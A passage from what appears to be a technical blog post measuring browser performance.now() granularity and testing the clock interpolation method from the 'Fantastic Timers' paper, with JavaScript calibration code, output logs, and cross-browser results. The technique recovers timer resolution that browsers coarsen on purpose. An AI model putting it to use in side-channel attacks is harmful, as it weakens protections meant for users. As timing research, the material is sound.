<span class="k">while</span><span class="p">((</span><span class="nx">next</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">())</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">counter</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">next</span><span class="p">,</span> <span class="nx">counter</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>and yields the following output on my machine/browser:</p>
<div class="highlight"><pre><span></span><code><span class="mf">5063.5999999996275</span><span class="w"> </span><span class="mf">4</span><span class="w"></span>
<span class="mf">5063.799999998882</span><span class="w"> </span><span class="mf">13</span><span class="w"></span>
<span class="mf">5063.89999999851</span><span class="w"> </span><span class="mf">5</span><span class="w"></span>
<span class="mf">5064.299999998882</span><span class="w"> </span><span class="mf">11</span><span class="w"></span>
<span class="mf">5064.799999998882</span><span class="w"> </span><span class="mf">35</span><span class="w"></span>
<span class="mf">5064.89999999851</span><span class="w"> </span><span class="mf">4</span><span class="w"></span>
<span class="mf">5065.0999999996275</span><span class="w"> </span><span class="mf">54</span><span class="w"></span>
<span class="mf">5065.199999999255</span><span class="w"> </span><span class="mf">2</span><span class="w"></span>
<span class="mf">5065.39999999851</span><span class="w"> </span><span class="mf">33</span><span class="w"></span>
<span class="mf">5065.5</span><span class="w"> </span><span class="mf">8</span><span class="w"></span>
<span class="mf">5065.699999999255</span><span class="w"> </span><span class="mf">32</span><span class="w"></span>
<span class="mf">5065.799999998882</span><span class="w"> </span><span class="mf">4</span><span class="w"></span>
<span class="mf">5066</span><span class="w"> </span><span class="mf">42</span><span class="w"></span>
<span class="mf">5066.0999999996275</span><span class="w"> </span><span class="mf">19</span><span class="w"></span>
<span class="mf">5066.199999999255</span><span class="w"> </span><span class="mf">3</span><span class="w"></span>
<span class="mf">5066.39999999851</span><span class="w"> </span><span class="mf">42</span><span class="w"></span>
<span class="mf">5066.5999999996275</span><span class="w"> </span><span class="mf">66</span><span class="w"></span>
<span class="mf">5066.799999998882</span><span class="w"> </span><span class="mf">6</span><span class="w"></span>
<span class="mf">5066.89999999851</span><span class="w"> </span><span class="mf">29</span><span class="w"></span>
<span class="mf">5067</span><span class="w"> </span><span class="mf">15</span><span class="w"></span>
</code></pre></div>
<p>What does the above output tell me?</p>
<p>Sometimes edges are <code>0.2ms</code> apart, sometimes <code>0.3ms</code> and sometimes just <code>0.1ms</code>.</p>
<p>In some cases edges are even <code>0.5ms</code> apart:</p>
<div class="highlight"><pre><span></span><code><span class="mf">5064.299999998882</span><span class="w"> </span><span class="mf">11</span><span class="w"></span>
<span class="mf">5064.799999998882</span><span class="w"> </span><span class="mf">35</span><span class="w"></span>
</code></pre></div>
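<p>To read the gaps off the log without doing the subtraction by hand, the logged timestamps can be diffed pairwise. This is only a small sketch over the first five values from the output above, with each gap rounded to one decimal place:</p>

```javascript
// First five edge timestamps (ms) from the output above.
const edges = [
  5063.5999999996275,
  5063.799999998882,
  5063.89999999851,
  5064.299999998882,
  5064.799999998882,
];

// Gap between each logged edge and the one logged before it, rounded to 0.1 ms.
const gaps = edges.slice(1).map((t, i) => (t - edges[i]).toFixed(1));

console.log(gaps.join(', '));
```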
<p>However, the assumption behind clock interpolation is that larger gaps between edges also come with larger counter values. Does that hold?</p>
<p>Let's collect some <a href="https://bot.incolumitas.com/timers/edges.html">statistically significant data</a>.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">samples</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">stats</span> <span class="o">=</span> <span class="p">{};</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">1000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">while</span><span class="p">((</span><span class="nx">next</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">())</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">counter</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">samples</span><span class="p">.</span><span class="nx">push</span><span class="p">([</span><span class="nx">last</span><span class="p">,</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">counter</span><span class="p">]);</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">sample</span> <span class="k">of</span> <span class="nx">samples</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">delta</span> <span class="o">=</span> <span class="p">(</span><span class="nx">sample</span><span class="p">[</span><span class="mf">1</span><span class="p">]</span> <span class="o">-</span> <span class="nx">sample</span><span class="p">[</span><span class="mf">0</span><span class="p">]).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">2</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">stats</span><span class="p">[</span><span class="nx">delta</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">stats</span><span class="p">[</span><span class="nx">delta</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span><span class="nx">sample</span><span class="p">[</span><span class="mf">2</span><span class="p">]]</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">stats</span><span class="p">[</span><span class="nx">delta</span><span class="p">].</span><span class="nx">push</span><span class="p">(</span><span class="nx">sample</span><span class="p">[</span><span class="mf">2</span><span class="p">])</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">stats</span><span class="p">)</span>
</code></pre></div>
<p>When invoking the code above, I don't find that larger edges have larger counter values.</p>
<p>I get quite weird results:</p>
<figure>
<img src="https://incolumitas.com/images/timersSamples.png" alt="timing" />
<figcaption>Most intervals we get are 0.1ms apart, but larger intervals such as 0.8ms can have quite low counter values. Why?</figcaption>
</figure>
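<p>One way to put numbers on such a plot is to reduce the <code>stats</code> object to one row per gap size. If interpolation worked as assumed, the increments per millisecond should be roughly constant across gap sizes. The following is a sketch only: <code>summarize</code> is a hypothetical helper, and the example data is made up for illustration, not measured.</p>

```javascript
// Reduce a `stats` object of the shape { '0.10': [count, count, ...], ... }
// to one row per gap size: number of samples, mean counter value and
// increments per millisecond (mean counter value divided by the gap).
function summarize(stats) {
  return Object.keys(stats)
    .sort((a, b) => Number(a) - Number(b))
    .map((delta) => {
      const counts = stats[delta];
      const mean = counts.reduce((sum, c) => sum + c, 0) / counts.length;
      return {
        gapMs: Number(delta),
        samples: counts.length,
        meanCount: mean,
        incrementsPerMs: mean / Number(delta),
      };
    });
}

// Made-up illustration data, NOT measurements from this article.
const exampleStats = { '0.80': [3, 5], '0.10': [4, 8, 6] };
const rows = summarize(exampleStats);
console.table(rows);
```

<p>In this invented example the <code>0.8ms</code> gap has a far lower rate of increments per millisecond than the <code>0.1ms</code> gap, which is the kind of inconsistency the figure above shows.</p>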
<p>Are the counter values larger and more stable on different machines with different CPUs? I am only testing on my very old laptop from 2014. Maybe this has a large influence. </p>
<p>Indeed, when testing on browserstack with macOS Big Sur and the latest Safari browser:</p>
<figure>
<img src="https://incolumitas.com/images/macOs-bigSur.png" alt="timing" />
<figcaption>Much higher counter values. By a factor of 100. They also appear to be more stable, thus giving us much more accurate timer resolutions.</figcaption>
</figure>
<p>So it has to be noted: <strong>Clock interpolation is highly dependent on OS and CPU!</strong> The faster the device, the larger the counter values and the more accurate the interpolation. </p>
<p>This is the clock interpolation algorithm proposed in the <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers Paper</a>.</p>
<p>You can also find the live example here: <a class="btn" href="https://bot.incolumitas.com/timers/calibrate.html">Live Example of Clock Interpolation</a></p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">pre</span> <span class="na">id</span><span class="o">=</span><span class="s">"output"</span><span class="p">></</span><span class="nt">pre</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">function</span> <span class="nx">write</span><span class="p">(</span><span class="nx">text</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">'output'</span><span class="p">).</span><span class="nx">innerText</span> <span class="o">+=</span> <span class="nx">text</span> <span class="o">+</span> <span class="s1">'\n'</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">calibrate</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">15</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">,</span> <span class="nx">next</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">next</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="nx">count</span> <span class="o">=</span> <span class="nx">count_edge</span><span class="p">();</span>
<span class="nx">counter</span> <span class="o">+=</span> <span class="nx">count</span><span class="p">;</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Increments per Edge (in Count): '</span> <span class="o">+</span> <span class="nx">count</span> <span class="p">);</span>
<span class="p">}</span>
<span class="nx">next</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">d1</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">()</span> <span class="o">-</span> <span class="nx">next</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">d2</span> <span class="o">=</span> <span class="nx">counter</span> <span class="o">/</span> <span class="nx">N</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">calibrated</span> <span class="o">=</span> <span class="nx">d1</span> <span class="o">/</span> <span class="nx">d2</span><span class="p">;</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Edge size in performance.now() (ms): '</span> <span class="o">+</span> <span class="nx">d1</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Average (n='</span> <span class="o">+</span> <span class="nx">N</span> <span class="o">+</span> <span class="s1">') edge size in increments: '</span> <span class="o">+</span> <span class="nx">d2</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Calibration value (average ms per increment step): '</span> <span class="o">+</span> <span class="nx">calibrated</span> <span class="p">);</span>
<span class="k">return</span> <span class="nx">calibrated</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">wait_edge</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">while</span><span class="p">((</span><span class="nx">next</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">())</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">next</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">count_edge</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">(),</span> <span class="nx">count</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">count</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">count</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">sleep</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">ms</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="nx">resolve</span> <span class="p">=></span> <span class="nx">setTimeout</span><span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">ms</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">measure</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">start</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="c1">// some heavy math that takes some time</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">k</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">k</span> <span class="o"><</span> <span class="mf">1000000</span><span class="p">;</span> <span class="nx">k</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">q</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">log10</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">pow</span><span class="p">(</span><span class="nx">k</span><span class="p">,</span> <span class="mf">2</span><span class="p">)</span> <span class="o">*</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">atan2</span><span class="p">(</span><span class="nx">k</span><span class="p">,</span> <span class="mf">1</span><span class="p">)</span> <span class="o">*</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">sqrt</span><span class="p">(</span><span class="nx">k</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="nx">count_edge</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">t1</span> <span class="o">-</span> <span class="nx">start</span><span class="p">)</span> <span class="o">-</span> <span class="nx">count</span> <span class="o">*</span> <span class="nx">calibrate</span><span class="p">();</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Count (Left in ongoing Edge): '</span> <span class="o">+</span> <span class="nx">count</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Original Timing: '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">t1</span> <span class="o">-</span> <span class="nx">start</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">6</span><span class="p">));</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Improved Timing: '</span> <span class="o">+</span> <span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">6</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">measurePrecision</span><span class="p">()</span> <span class="p">{</span>
<span class="c1">// The performance.now() method returns a DOMHighResTimeStamp, measured in milliseconds.</span>
<span class="kd">var</span> <span class="nx">samples</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">10000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">samples</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">());</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">diff1</span> <span class="o">=</span> <span class="nx">t1</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">diff2</span> <span class="o">=</span> <span class="nx">samples</span><span class="p">[</span><span class="nx">samples</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mf">1</span><span class="p">]</span> <span class="o">-</span> <span class="nx">samples</span><span class="p">[</span><span class="mf">0</span><span class="p">];</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'#1 Elapsed measured by performance.now(): '</span> <span class="o">+</span> <span class="nx">diff1</span> <span class="o">+</span> <span class="s1">'ms'</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'#2 Elapsed measured by collected samples: '</span> <span class="o">+</span> <span class="nx">diff2</span> <span class="o">+</span> <span class="s1">'ms'</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Number of samples: '</span> <span class="o">+</span> <span class="nx">samples</span><span class="p">.</span><span class="nx">length</span> <span class="p">);</span>
<span class="kd">let</span> <span class="nx">s</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Set</span><span class="p">(</span><span class="nx">samples</span><span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Number of unique samples / measuring steps: '</span> <span class="o">+</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Granularity/Precision #1 of performance.now(): '</span> <span class="o">+</span> <span class="nx">diff1</span> <span class="o">/</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="o">+</span> <span class="s1">'ms'</span> <span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">'Granularity/Precision #2 of performance.now(): '</span> <span class="o">+</span> <span class="nx">diff2</span> <span class="o">/</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="nx">write</span><span class="p">(</span><span class="s1">''</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">measurePrecision</span><span class="p">();</span>
<span class="nx">setTimeout</span><span class="p">(</span><span class="nx">measure</span><span class="p">,</span> <span class="mf">1000</span><span class="p">);</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>To be honest, I have some issues with their proposed calibration function:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">calibrate</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">,</span> <span class="nx">next</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">10</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">next</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="nx">counter</span> <span class="o">+=</span> <span class="nx">count_edge</span><span class="p">();</span>
<span class="p">}</span>
<span class="nx">next</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="k">return</span> <span class="p">(</span><span class="nx">wait_edge</span><span class="p">()</span> <span class="o">-</span> <span class="nx">next</span><span class="p">)</span> <span class="o">/</span> <span class="p">(</span><span class="nx">counter</span> <span class="o">/</span> <span class="mf">10.0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>As I have shown above, there is no clear correlation between <code>performance.now()</code> gap size and the
counter steps. In the function <code>calibrate()</code> they collect the edge size in counter steps for 10 samples and then they calibrate by</p>
<div class="highlight"><pre><span></span><code><span class="k">return</span> <span class="p">(</span><span class="nx">wait_edge</span><span class="p">()</span> <span class="o">-</span> <span class="nx">next</span><span class="p">)</span> <span class="o">/</span> <span class="p">(</span><span class="nx">counter</span> <span class="o">/</span> <span class="mf">10.0</span><span class="p">);</span>
</code></pre></div>
<p>That is, they divide the size of one edge, measured in <code>performance.now()</code> milliseconds, by the average edge size measured in counter values (N=10).</p>
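<p>To see what this division yields under ideal conditions, the same logic can be run against a deterministic clock instead of <code>performance.now()</code>. This is a sketch under assumptions: <code>makeFakeClock</code> is a hypothetical stand-in whose value jumps by a fixed amount after a fixed number of calls, and the clock is passed in as a parameter, which the paper's version does not do.</p>

```javascript
// Hypothetical fake clock standing in for performance.now(): the returned
// value only changes every `callsPerEdge` calls and then jumps by `edgeSize`.
function makeFakeClock(edgeSize, callsPerEdge) {
  let calls = 0;
  return function now() {
    const value = Math.floor(calls / callsPerEdge) * edgeSize;
    calls++;
    return value;
  };
}

// Same logic as wait_edge(): spin until the clock value changes.
function waitEdge(now) {
  const last = now();
  let next;
  while ((next = now()) === last) {}
  return next;
}

// Same logic as count_edge(): count iterations until the clock value changes.
function countEdge(now) {
  const last = now();
  let count = 0;
  while (now() === last) count++;
  return count;
}

// Same logic as calibrate(), with the clock and sample size as parameters.
function calibrate(now, n) {
  let counter = 0;
  for (let i = 0; i < n; i++) {
    waitEdge(now);
    counter += countEdge(now);
  }
  const next = waitEdge(now);
  return (waitEdge(now) - next) / (counter / n);
}

// Edge size 100 (think: microseconds), 50 clock reads per edge.
console.log(calibrate(makeFakeClock(100, 50), 10));
```

<p>With this fake clock each edge spans 50 reads, of which the counting loop registers 48, so the result is <code>100 / 48</code> (about 2.08 units per increment) against a true cost of 2 units per read. Even with a perfectly regular clock the calibration is slightly off, and a real browser is far less regular than this.</p>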
<p>I have some issues with that approach:</p>
<ol>
<li>It seems to me that the <code>counter</code> value for each <code>performance.now()</code> step is rather unpredictable. It's probably dependent on page load, JavaScript execution, overall processor load and so on.</li>
<li>We invoke <code>calibrate()</code> only after the function that we want to time. Who says that there isn't suddenly less load on the JavaScript engine, so that we obtain larger counter values than during the function's execution?</li>
</ol>
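<p>To get a feeling for the first concern, one could collect several <code>count_edge()</code> samples and look at how much they vary. The following is only a minimal sketch and not part of the original code: the helper name <code>spread()</code> and both sample arrays are made up for illustration.</p>

```javascript
// Hypothetical helper: summarizes how much a list of edge counts varies.
function spread(samples) {
  const mean = samples.reduce((a, b) => a + b, 0) / samples.length;
  const variance =
    samples.reduce((a, b) => a + (b - mean) ** 2, 0) / samples.length;
  const stddev = Math.sqrt(variance);
  // "relative" is the standard deviation as a fraction of the mean.
  return { mean, stddev, relative: stddev / mean };
}

// Made-up counts, as they might come from repeated count_edge() calls.
const stableCounts = [1000, 1010, 990, 1005, 995];
const noisyCounts = [1000, 400, 1600, 700, 1300];

console.log(spread(stableCounts).relative.toFixed(3));
console.log(spread(noisyCounts).relative.toFixed(3));
```

<p>The larger the relative spread, the less a single calibration factor can be trusted.</p>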
<p>But still, I think clock interpolation gives us better resolution than <code>performance.now()</code>.</p>
<p>What do we gain in resolution?</p>
<p>This is how a function with clock interpolation is measured:</p>
<div class="highlight"><pre><span></span><code><span class="k">async</span> <span class="kd">function</span> <span class="nx">measure</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">start</span> <span class="o">=</span> <span class="nx">wait_edge</span><span class="p">();</span>
<span class="c1">// some heavy math that takes some time</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">k</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">k</span> <span class="o"><</span> <span class="mf">10000000</span><span class="p">;</span> <span class="nx">k</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">q</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">log10</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">pow</span><span class="p">(</span><span class="nx">k</span><span class="p">,</span> <span class="mf">2</span><span class="p">)</span> <span class="o">*</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">atan2</span><span class="p">(</span><span class="nx">k</span><span class="p">,</span> <span class="mf">1</span><span class="p">)</span> <span class="o">*</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">sqrt</span><span class="p">(</span><span class="nx">k</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="nx">count_edge</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">t1</span> <span class="o">-</span> <span class="nx">start</span><span class="p">)</span> <span class="o">-</span> <span class="nx">count</span> <span class="o">*</span> <span class="nx">calibrate</span><span class="p">();</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Count (Left in ongoing Edge): '</span> <span class="o">+</span> <span class="nx">count</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Original Timing: '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">t1</span> <span class="o">-</span> <span class="nx">start</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">6</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Improved Timing: '</span> <span class="o">+</span> <span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">6</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>So the idea is actually the following:</p>
<p>The execution time of the function is measured with the variables <code>start</code> and <code>t1</code>. Both are populated from <code>performance.now()</code>.</p>
<p>However, before the <code>t1</code> measurement is taken, we wait until a new edge is reached (<code>var count = count_edge();</code>). We are now right at the start of a new edge, and <code>count</code> holds the number of increments that were left in the ongoing edge.</p>
<p>Then the elapsed time <code>t1 - start</code> is decreased by <code>count * calibrate()</code>.</p>
<p>Multiplying <code>calibrate()</code> by <code>count</code> basically translates <code>count</code> into milliseconds, and this number of milliseconds can be subtracted from the elapsed time to obtain a higher-resolution measurement.</p>
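<p>The steps above can be tried without a browser by injecting the clock. The following is a sketch under assumptions: <code>waitEdge()</code> and <code>countEdge()</code> are my guess at how the helpers behave (busy-wait until the clock value changes, and count loop iterations until it changes), and <code>makeFakeClock()</code> is an invented stand-in for a coarse <code>performance.now()</code> that only updates every 100 "ticks".</p>

```javascript
// Busy-wait until the coarse clock jumps to a new value; return that value.
function waitEdge(now) {
  const last = now();
  let next;
  while ((next = now()) === last) {}
  return next;
}

// Count loop iterations until the coarse clock jumps again.
function countEdge(now) {
  const last = now();
  let count = 0;
  while (now() === last) count++;
  return count;
}

// Milliseconds per counter increment, averaged over `samples` edges.
function calibrate(now, samples = 10) {
  let counter = 0;
  for (let i = 0; i < samples; i++) {
    waitEdge(now);
    counter += countEdge(now);
  }
  const start = waitEdge(now);
  return (waitEdge(now) - start) / (counter / samples);
}

// Time fn(), then subtract the part of the last edge that fn() did not use.
function measure(now, fn) {
  const start = waitEdge(now);
  fn();
  const count = countEdge(now);
  const t1 = now();
  const coarse = t1 - start;
  return { coarse, improved: coarse - count * calibrate(now) };
}

// Invented fake clock: every call costs one tick of "real" time, but the
// reported value only changes every `ticksPerStep` ticks.
function makeFakeClock(ticksPerStep = 100, stepMs = 1) {
  let ticks = 0;
  const now = () => Math.floor(ticks++ / ticksPerStep) * stepMs;
  now.burn = (n) => { ticks += n; }; // simulate work that takes n ticks
  return now;
}

// Simulated workload of 250 ticks, i.e. 2.5 ms on the fake clock.
const demoClock = makeFakeClock();
const demo = measure(demoClock, () => demoClock.burn(250));
console.log('coarse:', demo.coarse, 'improved:', demo.improved.toFixed(3));
```

<p>With the fake clock, the coarse timing is rounded up to whole milliseconds, while the interpolated value lands much closer to the simulated 2.5 ms. On a real machine the counter rate is not constant, which is exactly the concern raised above.</p>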
<h3>Clock interpolation on different operating systems and machines</h3>
<p>I am using BrowserStack to conduct my experiments, with real devices visiting my <a href="https://bot.incolumitas.com/timers/calibrate.html">Live Page of Clock Interpolation</a>.</p>
<h4>Win 11 with Chrome 97</h4>
<figure>
<img src="https://incolumitas.com/images/windows11-chrome-97.png" alt="timing" />
<figcaption>Win 11 with Chrome 97</figcaption>
</figure>
<h4>Win 11 with Firefox 95</h4>
<figure>
<img src="https://incolumitas.com/images/windows11-ff-95.png" alt="timing" />
<figcaption>Win 11 with Firefox 95</figcaption>
</figure>
<h4>Win 10 with Firefox 95</h4>
<figure>
<img src="https://incolumitas.com/images/windows10-ff-95.png" alt="timing" />
